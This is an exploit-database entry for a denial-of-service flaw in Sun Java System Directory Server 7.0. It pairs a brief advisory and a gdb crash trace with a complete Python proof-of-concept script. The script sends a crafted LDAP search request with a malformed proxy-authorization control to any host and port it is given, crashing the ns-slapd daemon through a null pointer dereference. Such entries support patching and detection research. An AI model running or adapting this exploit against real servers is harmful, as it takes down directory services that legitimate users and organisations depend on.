Sun Java System Directory Server 7.0 - core_get_proxyauth_dn Denial of Service

2010-01-10T00:00:00
ID EXPLOITPACK:BC9BBA16BFB85B22A9C5291B340CC50F
Type exploitpack
Reporter Intevydis
Modified 2010-01-10T00:00:00

Description

Sun Java System Directory Server 7.0 - core_get_proxyauth_dn Denial of Service

                                        
                                            source: https://www.securityfocus.com/bid/37699/info

Sun Java System Directory Server is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to crash the effected application, denying service to legitimate users.

Directory Server 7.0 is vulnerable; other versions may also be affected. 

#!/usr/bin/env python
# sun_dsee7.py
#
# Use this code at your own risk. Never run it against a production system.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

import socket
import sys

"""
Sun Directory Server 7.0 core_get_proxyauth_dn() DoS (null ptr dereference)
Tested on SUSE Linux Enterprise Server 11 

# dsadm -V
[dsadm]
dsadm               : 7.0                  B2009.1104.2350 ZIP

Copyright 2009 Sun Microsystems, Inc. All Rights Reserved.
SUN PROPRIETARY/CONFIDENTIAL.
Use is subject to license terms.

[slapd 32-bit]
Sun Microsystems, Inc.
Sun-Directory-Server/7.0 B2009.1104.2350 32-bit
ns-slapd            : 7.0                  B2009.1104.2350 ZIP
Slapd Library       : 7.0                  B2009.1104.2350
Front-End Library   : 7.0                  B2009.1104.2350

This simple proof of concept code will crash ns-slapd daemon:

Attaching to process 10204
Reading symbols from /opt/sun/dsee7/lib/ns-slapd...(no debugging symbols found)...done.
Reading symbols from /lib/libpthread.so.0...(no debugging symbols found)...done.
...
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb1b47b90 (LWP 10233)]
0xb80098c4 in core_get_proxyauth_dn () from /opt/sun/dsee7/lib/libslapd.so
(gdb) bt
#0  0xb80098c4 in core_get_proxyauth_dn () from /opt/sun/dsee7/lib/libslapd.so
#1  0xb7ff30d3 in common_core_set_pb () from /opt/sun/dsee7/lib/libslapd.so
#2  0xb7f1c7eb in search_core_set_pb () from /opt/sun/dsee7/lib/libfe.so
#3  0xb7f2667f in ldap_decode_search () from /opt/sun/dsee7/lib/libfe.so
#4  0xb7f27993 in ldap_parse_request () from /opt/sun/dsee7/lib/libfe.so
#5  0xb7f147a4 in process_ldap_operation_using_core_api () from /opt/sun/dsee7/lib/libfe.so
#6  0xb7f149ba in ldap_frontend_main_using_core_api () from /opt/sun/dsee7/lib/libfe.so
#7  0xb7f153e3 in generic_workerthreadmain () from /opt/sun/dsee7/lib/libfe.so
#8  0xb7eec89e in _pt_root () from /opt/sun/dsee7/lib/../lib/private/libnspr4.so
#9  0xb80481b5 in start_thread () from /lib/libpthread.so.0
#10 0xb7ccb3be in clone () from /lib/libc.so.6
(gdb) x/i $eip
0xb80098c4 :	cmpb   $0x4,(%eax)
(gdb) i r eax
eax            0x0	0
(gdb) 

"""

def send_req(host,port):
	"""
LDAP Message, Search Request
        Message Id: 1
        Message Type: Search Request (0x03)
        Message Length: 270
        Base DN: (null)
        Scope: Subtree (0x02)
        Dereference: Never (0x00)
        Size Limit: 0
        Time Limit: 0
        Attributes Only: False
        Filter: (objectClass=*)
        Attribute: (null)
        LDAP Controls
            LDAP Control
                Control OID: 2.16.840.1.113730.3.4.18
                Control Critical: True
            ERROR: Couldn't parse LDAP Control: Wrong type for that item
        """

       	reqdump="""
	30 82 01 15 02 01 01 63 82 01 0e 04 00 0a 01 02
        0a 01 00 02 01 00 02 01 00 01 01 00 87 0b 6f 62
        6a 65 63 74 43 6c 61 73 73 30 02 04 00 a0 81 e9
        30 81 e6 04 18 32 2e 31 36 2e 38 34 30 2e 31 2e
        31 31 33 37 33 30 2e 33 2e 34 2e 31 38 01 01 01
        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
        01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
        01 01 01 01 01 01 00 04 00
	"""

	buf = ""
	for i in filter(lambda x: len(x.strip())>0, reqdump.split(" ")):
		buf+=chr(int(i,16))

	print "Sending req to %s:%d" % (host,port)

	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock.connect((host,port))
	sock.sendall(buf)
	sock.close()

	print "Done"

if __name__=="__main__":
	if len(sys.argv)<3:
		print "usage: %s host port" % sys.argv[0]
		sys.exit()

	send_req(sys.argv[1],int(sys.argv[2]))